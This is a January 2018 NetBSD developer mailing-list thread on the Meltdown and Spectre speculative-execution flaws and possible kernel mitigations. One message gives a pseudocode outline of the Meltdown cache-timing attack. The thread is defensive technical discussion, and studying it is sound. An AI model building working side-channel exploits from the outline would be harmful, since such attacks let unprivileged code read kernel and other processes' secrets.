Re: meltdown

2018-01-06 Thread Michael
Hello,

On Sat, 6 Jan 2018 07:33:50 +
m...@netbsd.org wrote:

> Loongson-2 had an issue where from branch prediction it would prefetch
> instructions from the I/O area and deadlock.
> 
> This happened in normal usage so we build the kernel with a binutils
> flag to output different jumps and flush the BTB on kernel entry.*

I remember when we added support for those flags to our gcc & binutils.

> I wouldn't count on MIPS CPUs to hold under the same level of scrutiny
> as x86 CPUs, luckily they're pretty obscure (and most probably aren't
> speculative).

Yeah, I doubt there are a lot of IRIX servers left, and embedded MIPS
is probably safe ;)

have fun
Michael


Re: meltdown

2018-01-06 Thread Paul.Koning


> On Jan 5, 2018, at 8:55 PM, Thor Lancelot Simon  wrote:
> 
> On Thu, Jan 04, 2018 at 04:58:30PM -0500, Mouse wrote:
>>> As I understand it, on intel cpus and possibly more, we'll need to
>>> unmap the kernel on userret, or else userland can read arbitrary
>>> kernel memory.
>> 
>> "Possibly more"?  Anything that does speculative execution needs a good
>> hard look, and that's damn near everything these days.
> 
> I wonder about just "these days".  The potential for this kind of problem
> goes all the way back to STRETCH or the 6600, doesn't it?  If they had
> memory permissions, which I frankly don't know.  And even in microprocessors
> it's got to go back to... the end of the 1980s (R6000?) certainly the 1990s.

No, the issue here isn't permissions, the issue is speculative execution
that leaves observable side effects (such as the existence of cache entries)
after the speculative path is abandoned.  And in the case of Meltdown (though
not Spectre) it also requires having the speculative load issue omit the
access permission check.

CDC 6600 has memory relocation, but not permissions, and in any case it
does not have speculative execution of any type.  It does have multiple
issue, of course, but that alone is not sufficient to create the 
vulnerability.

> Though of course "fail early" is an obvious principle to security types,
> given the cost of aborting work in progress I can easily see the
> opposite being true for CPU designers (I'm not one, so I don't really
> know).  Which idiom (check permissions, then speculate / speculate, then
> check permissions) is more common?

Clearly it depends on the design, either on what's straightforward or 
efficient to do, or on what is considered essential by the particular
designers involved.

Presumably (one hopes) the result of the current work is that design
techniques will change.  And especially, that a better and wider understanding
of side channel attacks will appear.

Side channel attacks can be quite strange and esoteric.  They are worth
reading about.  My favorite is one I read a year or so ago, a paper
describing capturing the sound made by the electronics inside a cell phone
as it was performing an RSA crypto operation.  This allowed the attacker
to reconstruct the RSA secret key without having to install any special
software in the phone, and without having to tamper with the phone physically
in any way.

paul


Re: meltdown

2018-01-06 Thread Mouse
>> Though of course "fail early" is an obvious principle to security
>> types, given the cost of aborting work in progress I can easily see
>> the opposite being true for CPU designers (I'm not one, so I don't
>> really know).  Which idiom (check permissions, then speculate /
>> speculate, then check permissions) is more common?
> No idea, one would think that failing early in order to avoid
> unnecessary resource usage would be useful.

Perhaps, but _not_ failing is a win if it turns out the spec ex is
confirmed instead of annulled.  And if the silicon would be sitting
idle otherwise, the only resource used is power.  (And die area, but
that's used in a static sense, not a dynamic sense.)

> Then again, the problem seems to be that not everything from the
> speculative path gets canceled / annulled, not so much that the
> speculation took place.

I agree.  For cache issues...it might be useful to freeze spec ex on a
cache miss.  Go ahead and service the cache miss, but keep the result
in a separate cache line, not part of the normal cache.  On annullment,
just drop it; on confirmation, push it into the normal cache and
unfreeze.  If you want to get really fancy, have multiple speculative
cache lines, kind of a small cache in front of the regular cache purely
for speculative use, and don't freeze speculation unless it fills up.
Though the spectre (ha ha) of coherency then raises its ugly head.

Does anyone know how the typical time to service a cache miss compares
with the typical time to determine whether spec ex is annulled or
confirmed?  If the former is longer, or at least not much shorter, than
the latter, then this wouldn't even impair performance much in the miss
case.

Of course, this wouldn't do anything about covert channels other than
the cache.  But it'd stop anything using the cache for a covert channel
between spec ex and mainline code cold (meltdown and some variants of
spectre).  It's only a partial fix, but, for most purposes, that's
better than no fix.

Of course, some of the covert channels touched on in the spectre paper
are not fixable, such as power consumption and EMI generation;
fortunately, they are significantly harder to read from software.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTMLmo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread maya
On Sat, Jan 06, 2018 at 01:41:38AM -0500, Michael wrote:
> R10k had all sorts of weirdo speculative execution related problems
> ( see hardware workarounds in the O2 ), and I doubt it's the first to
> implement it.

Loongson-2 had an issue where from branch prediction it would prefetch
instructions from the I/O area and deadlock.

This happened in normal usage so we build the kernel with a binutils
flag to output different jumps and flush the BTB on kernel entry.*

I wouldn't count on MIPS CPUs to hold under the same level of scrutiny
as x86 CPUs, luckily they're pretty obscure (and most probably aren't
speculative).

* https://sourceware.org/ml/binutils/2009-11/msg00387.html


Re: meltdown

2018-01-05 Thread Michael
Hello,

On Fri, 5 Jan 2018 20:55:19 -0500
Thor Lancelot Simon  wrote:

> On Thu, Jan 04, 2018 at 04:58:30PM -0500, Mouse wrote:
> > > As I understand it, on intel cpus and possibly more, we'll need to
> > > unmap the kernel on userret, or else userland can read arbitrary
> > > kernel memory.  
> > 
> > "Possibly more"?  Anything that does speculative execution needs a good
> > hard look, and that's damn near everything these days.  
> 
> I wonder about just "these days".  The potential for this kind of problem
> goes all the way back to STRETCH or the 6600, doesn't it?  If they had
> memory permissions, which I frankly don't know.  And even in microprocessors
> it's got to go back to... the end of the 1980s (R6000?) certainly the 1990s.

R10k had all sorts of weirdo speculative execution related problems
( see hardware workarounds in the O2 ), and I doubt it's the first to
implement it.

> Though of course "fail early" is an obvious principle to security types,
> given the cost of aborting work in progress I can easily see the
> opposite being true for CPU designers (I'm not one, so I don't really
> know).  Which idiom (check permissions, then speculate / speculate, then
> check permissions) is more common?

No idea, one would think that failing early in order to avoid
unnecessary resource usage would be useful. Then again, the problem
seems to be that not everything from the speculative path gets
canceled / annulled, not so much that the speculation took place.

have fun
Michael


Re: meltdown

2018-01-05 Thread Mouse
>> "Possibly more"?  Anything that does speculative execution needs a
>> good hard look, and that's damn near everything these days.
> I wonder about just "these days".  The potential for this kind of
> problem goes all the way back to STRETCH or the 6600, doesn't it?

I don't know; I don't know enough about either.

> Though of course "fail early" is an obvious principle to security
> types, given the cost of aborting work in progress I can easily see
> the opposite being true for CPU designers

I think it's less the cost of aborting work in progress and more the
(performance) cost of not keeping silicon busy all the time.

> (I'm not one, so I don't really know).

Me neither.  But it seems passing obvious to me that these hardware
bugs were at least partially driven by customer demand for performance.
And, to be sure, there are workloads for which neither meltdown nor
spectre is a significant risk, even if the hardware is vulnerable.

> Which idiom (check permissions, then speculate / speculate, then
> check permissions) is more common?

I don't know.  But the problem is only partially when permissions get
checked.  Consider spectre used by sandboxed code to read outside the
sandbox within a single process; this is doing nothing that, from the
hardware point of view, would violate permissions.  I could easily see
a CPU designer saying "So what's the problem if the code can read that
memory?  It can read it anytime it wants with a simple load anyway.".
The problem is also failure to roll back _all_ side effects when
annulling speculative execution.  (To be sure, even if that were done
it wouldn't fix quite the whole problem; closing one side-channel
doesn't necessarily close other side-channels.  But it would help.)

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTMLmo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread Thor Lancelot Simon
On Thu, Jan 04, 2018 at 04:58:30PM -0500, Mouse wrote:
> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.

I wonder about just "these days".  The potential for this kind of problem
goes all the way back to STRETCH or the 6600, doesn't it?  If they had
memory permissions, which I frankly don't know.  And even in microprocessors
it's got to go back to... the end of the 1980s (R6000?) certainly the 1990s.

Though of course "fail early" is an obvious principle to security types,
given the cost of aborting work in progress I can easily see the
opposite being true for CPU designers (I'm not one, so I don't really
know).  Which idiom (check permissions, then speculate / speculate, then
check permissions) is more common?

Thor


Re: meltdown

2018-01-05 Thread Ted Lemon
On Jan 5, 2018, at 8:52 AM,   wrote:
> so the illegal read is also speculative, and is voided (exception
> and all) when the wrong branch prediction is sorted out. But it
> looks like the paper is saying that refinement has not been
> demonstrated, though such branch prediction hacks have been shown
> in other exploits.  Still, if that can be done, a test for
> "SEGV too often" is no help.

Actually, the javascript exploit works exactly in this way.   Sigh.



RE: meltdown

2018-01-05 Thread Terry Moore
> I think you are confusing spectre and meltdown.

 

Yes, my apologies.

--Tery



Re: meltdown

2018-01-05 Thread Paul.Koning


> On Jan 4, 2018, at 6:01 PM, Warner Losh  wrote:
> 
> 
> 
> On Thu, Jan 4, 2018 at 2:58 PM, Mouse  wrote:
> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
> 
> > Also, I understand that to exploit this, one has to attempt to access
> > kernel memory a lot, and SEGV at least once per bit.
> 
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
> 
> Nowhere in there is a SEGV generated.
> 
> That's the meltdown stuff.  Spectre targets other things (I've seen
> branch prediction mentioned) to leak information around protection
> barriers.
> 
> I think you are confusing spectre and meltdown.
> 
> meltdown requires a sequence like:
> 
> exception (*0 = 0 or a = 1 / 0);
> do speculative read
> 
> to force a trip into kernel land just before the speculative read so that 
> otherwise not readable stuff gets (or does not get) read into cache which can 
> then be probed for data.

No, that's not correct.  You were being mislead by the "Toy example".
The toy example demonstrates that speculative operation are done
after the point in the code that generates an exception, but it in
itself is NOT the exploit.

The exploit has the form:

x = read(secret_memory_location);
touch (cacheline[x]);
while (1) ;

The first line will SEGV, of course, but in the vulnerable CPUs
the speculative load is issued before that happens.  And also before
the SEGV happens, cacheline[x] is touched, making that line resident
in the cache.  This "transmits to the side channel".

Next, the SEGV happens.  The exploit catches that, and then it
does a timing test on references to cacheline[i] to see which i is
now resident.  That i is the value  of x.

As the paper points out, it would be possible in principle to prefix
the exploit with

if (false) // predict_true

so the illegal read is also speculative, and is voided (exception
and all) when the wrong branch prediction is sorted out. But it
looks like the paper is saying that refinement has not been
demonstrated, though such branch prediction hacks have been shown
in other exploits.  Still, if that can be done, a test for
"SEGV too often" is no help.

The Meltdown paper clearly says that the KAISER fix cures this
vulnerability.  And while it doesn't say so, it is also clear that
the problem does not exist on CPUs where speculative memory references
do page protection checks.

All the above applies to Meltdown.  Spectre is unrelated in its
core mechanism.  The fact that both eventually end up using side
channels and were published at the same time seems to have caused
some confusion between the two.  It is important to understand they
are independent, stem from different underlying problems, apply
to a different set of vulnerable chips, and have different cures.

paul



Re: meltdown

2018-01-05 Thread Mouse
> If there's anything this issue showed is that we definitely need
> fewer people independently considering the issue and openly
> discussing their own (occasionally wrong) suggestions.

Actually, it seems to me we need more.  More minds looking at it, more
discussion of the various ramifications and workarounds.  Lack of
public discussion serves nobody at this point, possibly execpting
chip-makers trying to downplay their bugs.  The hardware bugs behind
these (that speculative execution doesn't make security checks
correctly and doesn't roll back all its side effects when annulled) are
so ubiquitous that the _correct_ fix - buying non-buggy hardware - is
close to impossible.  The only thing most people can do is try to find
workarounds.

I feel reasonably sure that, at this point, there are at least a few
exploitable side-channels and a few workarounds that aren't known
publicly (possibly at all), and more people thinking about them is the
only thing likely to fix that.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTMLmo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-05 Thread Piotr Meyer
On Fri, Jan 05, 2018 at 02:48:11AM -0600, Dave Huang wrote:
> On Jan 4, 2018, at 15:22, Phil Nelson  wrote:
> > How about turning on the workaround for any process that ignores
> > or catches SEGV.Any process that is terminated by a SEGV should
> > be safe, shouldn't it?
> 
> Isn't there a suggested mitigation? Seems to me NetBSD should implement 
> it as suggested, rather than coming up with its own special criteria 
> for when to enable the workaround.

BTW: latest summary below:

https://security.googleblog.com/2018/01/more-details-about-mitigations-for-cpu_4.html

https://www.theregister.co.uk/2018/01/05/spectre_flaws_explained/

Regards,
-- 
Piotr 'aniou' Meyer


Re: meltdown

2018-01-05 Thread maya
If there's anything this issue showed is that we definitely need fewer
people independently considering the issue and openly discussing their
own (occasionally wrong) suggestions.

It was just a suggestion, I'm not a source of authority.


Re: meltdown

2018-01-05 Thread Dave Huang
On Jan 4, 2018, at 15:22, Phil Nelson  wrote:
> How about turning on the workaround for any process that ignores
> or catches SEGV.Any process that is terminated by a SEGV should
> be safe, shouldn't it?

Isn't there a suggested mitigation? Seems to me NetBSD should implement 
it as suggested, rather than coming up with its own special criteria 
for when to enable the workaround.
-- 
Name: Dave Huang |  Mammal, mammal / their names are called /
INet: k...@azeotrope.org |  they raise a paw / the bat, the cat /
Telegram: @DahanC|  dolphin and dog / koala bear and hog -- TMBG
Dahan: Hani G Y+C 42 Y++ L+++ W- C++ T++ A+ E+ S++ V++ F- Q+++ P+ B+ PA+ PL++



Re: meltdown

2018-01-05 Thread Phil Nelson
On Thursday 04 January 2018 12:49:22 m...@netbsd.org wrote:
> I wonder if we can count the number of SEGVs and if we get a few, turn
> on the workaround? 

How about turning on the workaround for any process that ignores
or catches SEGV.Any process that is terminated by a SEGV should
be safe, shouldn't it?

--Phil

-- 
Phil Nelson, http://pcnelson.net



Re: meltdown

2018-01-05 Thread Warner Losh
On Thu, Jan 4, 2018 at 2:58 PM, Mouse  wrote:

> > As I understand it, on intel cpus and possibly more, we'll need to
> > unmap the kernel on userret, or else userland can read arbitrary
> > kernel memory.
>
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
>
> > Also, I understand that to exploit this, one has to attempt to access
> > kernel memory a lot, and SEGV at least once per bit.
>
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
>
> Nowhere in there is a SEGV generated.
>
> That's the meltdown stuff.  Spectre targets other things (I've seen
> branch prediction mentioned) to leak information around protection
> barriers.
>

I think you are confusing spectre and meltdown.

meltdown requires a sequence like:

exception (*0 = 0 or a = 1 / 0);
do speculative read

to force a trip into kernel land just before the speculative read so that
otherwise not readable stuff gets (or does not get) read into cache which
can then be probed for data.

spectre requires  a trip into the kernel to force execution of

if (from-userland < boundary) { array[from-userland] 

RE: meltdown

2018-01-04 Thread Terry Moore
> As I understand it, on intel cpus and possibly more, we'll need to unmap
> the kernel on userret, or else userland can read arbitrary kernel
> memory.
>
> People seem to be mentioning a 50% performance penalty and we might do
> worse (we don't have vDSOs...)

I suggest sticking to the original papers which are at meltdownattack.com:

https://meltdownattack.com/meltdown.pdf
and 
https://spectreattack.com/spectre.pdf

The problems are fairly subtle.

They demonstrated (in the Meltdown paper) that you can use JIT compiled code
(they used JavaScript in Chrome) to read anything in the Chrome processes'
memory. The kernel memory exploit is troubling, but actually easier to
mitigate. It looks relatively *easier* to mitigate the kernel/user
separation problem.  I think more thought needs to go into how this effects
sandboxing approaches (JIT, interpreters, Docker, XEN, etc). JIT, docker,
Xen are all mentioned as having difficulties.

If I understand the paper correctly, the K/U space unmapping must be
accompanied on x86 (32/64) by KASLR; otherwise the things that must always
be mapped in U space (trap handlers, etc.) can be used to get access anyway.

I don't think you need to SEGV to get this data - the SEGVs can be on the
speculative ("predicted taken") branch path, but the branch is not actually
taken, so the SEGV never gets reported. However, the cache state is changed
by the speculative path.

But really: we all need to read the primary papers, and not pay too much
attention to the press about this the press discussion is not really
very helpful (at least as of this morning EDT).

--Terry



Re: meltdown

2018-01-04 Thread Paul.Koning


> On Jan 4, 2018, at 4:58 PM, Mouse  wrote:
> 
>> As I understand it, on intel cpus and possibly more, we'll need to
>> unmap the kernel on userret, or else userland can read arbitrary
>> kernel memory.
> 
> "Possibly more"?  Anything that does speculative execution needs a good
> hard look, and that's damn near everything these days.
> 
>> Also, I understand that to exploit this, one has to attempt to access
>> kernel memory a lot, and SEGV at least once per bit.
> 
> I don't think so.  Traps that would be taken during normal execution
> are not taken during speculative execution.  The problem is, to quote
> one writeup I found, "Intel CPUs are allowed to access kernel memory
> when performing speculative execution, even when the application in
> question is running in user memory space.  The CPU does check to see if
> an invalid memory access occurs, but it performs the check after
> speculative execution, not before.".  This means that things like cache
> line loads can occur based on values the currently executing process
> should not be able to access; timing access to data that cache-collides
> with the cache lines of interest reveals the leaked bit(s).
> 
> Nowhere in there is a SEGV generated.

That depends.  The straightforward case of Meltdown starts with an
illegal load, which the CPU will execute anyway speculatively, resulting
in downstream code execution that can be used to change the cache state.
In that form, the load eventually aborts.

There's a discussion in the paper that the load could be preceded by
a branch not taken that's predicted taken.  If so, the SEGV would indeed
not happen, but it isn't clear how feasible this is.

In any case, the problem would not occur in any CPU that does protection
checks prior to issuing speculative memory references.  

paul



Re: meltdown

2018-01-04 Thread Mouse
> As I understand it, on intel cpus and possibly more, we'll need to
> unmap the kernel on userret, or else userland can read arbitrary
> kernel memory.

"Possibly more"?  Anything that does speculative execution needs a good
hard look, and that's damn near everything these days.

> Also, I understand that to exploit this, one has to attempt to access
> kernel memory a lot, and SEGV at least once per bit.

I don't think so.  Traps that would be taken during normal execution
are not taken during speculative execution.  The problem is, to quote
one writeup I found, "Intel CPUs are allowed to access kernel memory
when performing speculative execution, even when the application in
question is running in user memory space.  The CPU does check to see if
an invalid memory access occurs, but it performs the check after
speculative execution, not before.".  This means that things like cache
line loads can occur based on values the currently executing process
should not be able to access; timing access to data that cache-collides
with the cache lines of interest reveals the leaked bit(s).

Nowhere in there is a SEGV generated.

That's the meltdown stuff.  Spectre targets other things (I've seen
branch prediction mentioned) to leak information around protection
barriers.

/~\ The ASCII Mouse
\ / Ribbon Campaign
 X  Against HTMLmo...@rodents-montreal.org
/ \ Email!   7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B


Re: meltdown

2018-01-04 Thread maya
On Thu, Jan 04, 2018 at 10:01:34PM +0100, Kamil Rytarowski wrote:
> We have: PaX Segvguard. Can we mitigate it with this feature?
> 

that's what gave me the idea, but I think segvguard is per-binary, and I
could just make new binaries to keep on attacking the kernel.


Re: meltdown

2018-01-04 Thread Kamil Rytarowski
On 04.01.2018 21:49, m...@netbsd.org wrote:
> Also, I understand that to exploit this, one has to attempt to access
> kernel memory a lot, and SEGV at least once per bit.
> 
> I wonder if we can count the number of SEGVs and if we get a few, turn
> on the workaround? that would at least spare us the performance penalty
> for normal code.
> 

We have: PaX Segvguard. Can we mitigate it with this feature?



signature.asc
Description: OpenPGP digital signature